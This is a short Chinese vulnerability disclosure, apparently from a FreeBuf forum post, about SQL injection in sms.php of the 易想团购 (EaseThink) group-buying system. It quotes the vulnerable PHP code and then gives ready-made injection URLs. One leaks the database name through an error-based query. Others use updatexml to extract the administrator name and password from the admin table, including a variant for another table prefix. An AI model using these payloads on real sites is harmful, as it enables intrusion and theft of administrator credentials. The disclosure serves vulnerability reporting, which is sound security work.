首发:http://club.freebuf.com/?/question/416
by 0x53sec http://www.freebuf.com/author/0x53sec
易想团购系统sms.php文件里面的几个变量过滤不严格导致了SQL注入漏洞。 部分代码:
elseif($_REQUEST['act']=='do_unsubscribe_verify')
{
$code = trim($_REQUEST['code']);
$mobile = trim($_REQUEST['mobile']);
$mobile_item = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile = '".$mobile."' and verify_code = '".$code."'"); //这里的$mobile和$code变量都只过滤了空格,导致了SQL注入的产生。
if($mobile_item)
{
$GLOBALS['db']->query("delete from ".DB_PREFIX."mobile_list where id = ".$mobile_item['id']);
$result['type'] = 1;
ajax_return($result);
}
else
{
$result['type'] = 0;
$result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR'];
ajax_return($result);
}
}
?>
Exp:
/sms.php?act=do_unsubscribe_verify&code='%20and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
获取管理帐号密码:
/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))%23
改表前缀
/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))%23